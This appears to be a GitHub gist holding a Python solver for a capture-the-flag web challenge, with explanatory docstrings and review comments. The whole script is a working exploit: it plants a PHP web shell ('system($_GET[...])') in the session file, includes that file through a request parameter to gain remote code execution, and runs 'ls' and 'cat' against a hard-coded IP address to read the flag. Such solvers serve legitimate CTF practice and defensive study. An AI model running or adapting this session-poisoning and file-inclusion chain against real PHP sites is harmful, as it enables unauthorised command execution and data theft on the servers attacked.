@Aviksaikat
Created December 27, 2022 11:46
get the flag OOPs style
#!/usr/bin/python3
import re
from requests import Session
class RCE:
    """Client for the gist's challenge chain, driven over one `requests.Session`.

    What this script does, as visible here: it reads the PHPSESSID cookie the
    server sets, sends PHP source as the `karma` parameter, then points
    `karma` at `/tmp/sess_<PHPSESSID>` and passes a command in `jadu`.  The
    server side is not shown; the comments below only describe what is sent
    and read.  From a defender's view the chain presumes that a request
    parameter reaches a file include and that session data is written
    verbatim to a predictable path — rejecting user-controlled include paths
    breaks it, and a request whose `karma` value contains `<?php` or a
    `/tmp/sess_` path is a clear detection signal.
    """

    def __init__(self, url: str):
        # One Session so the cookie set by the first response is re-sent on
        # every later request; the session-file name below depends on it.
        self.s = Session()
        self.url = url

    def send_payload(self) -> None:
        # Sends PHP source as the `karma` value.  Presumably the server
        # stores the value in the session file so that the later include
        # executes it — TODO confirm against the challenge source.
        self.s.get(self.url + "?karma=" + "<?php system($_GET['jadu']); ?>")

    def payload(self, cookie: str, cmd: str | None = None) -> str:
        """Return the query string pointing `karma` at `/tmp/sess_<cookie>`.

        `cmd`, when truthy, is appended as `jadu` without URL-encoding; the
        space in "ls /" is left for requests to requote.  `cookie` is the
        server-supplied PHPSESSID and is interpolated unvalidated.
        """
        if cmd:
            return f"?karma=/tmp/sess_{cookie}&jadu={cmd}"
        else:
            return f"?karma=/tmp/sess_{cookie}"

    def run(self) -> None:
        """Execute the full chain and print the flag.

        Raises KeyError if the first response sets no PHPSESSID cookie, and
        IndexError if either regex below finds no match.
        """
        r = self.s.get(self.url)
        # get the location of the session file
        cookie = r.cookies.get_dict()["PHPSESSID"]
        # Include the session file before any payload is stored; the effect of
        # this priming request is not visible from the script.
        r = self.s.get(self.url + self.payload(cookie))
        self.send_payload()
        r = self.s.get(self.url + self.payload(cookie, "ls /"))
        # NOTE(review): findall()[0] raises IndexError when there is no match,
        # so the len(file) == 0 branch below is unreachable.  The pattern is a
        # literal, so on a match `file` is always that exact name.
        file = re.findall("seCretJutsuToKillBorUtoKun.txt", r.text)[0]
        if len(file) == 0:
            print("Oops something wrong no output found!!")
            # site-module exit(); sys.exit would be the portable form
            exit(-1)
        # Re-sent because the previous include presumably replaced the session
        # contents — TODO confirm.
        self.send_payload()
        r = self.s.get(self.url + self.payload(cookie, f"cat /{file}"))
        # Keeps only the text after the last ':' — assumes the page layout of
        # this challenge; verify before reuse.
        msg = r.text.split(":")[-1]
        print(msg)
        # Greedy `.*`: spans to the last '}' in msg; [-1] raises if no match.
        flag = re.findall("FLAG{.*}", msg)[-1]
        print("\nFlag: " + flag)
def main() -> None:
    """Entry point: run the chain against the hard-coded challenge URL."""
    target = "http://44.200.237.73/"
    RCE(target).run()
if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()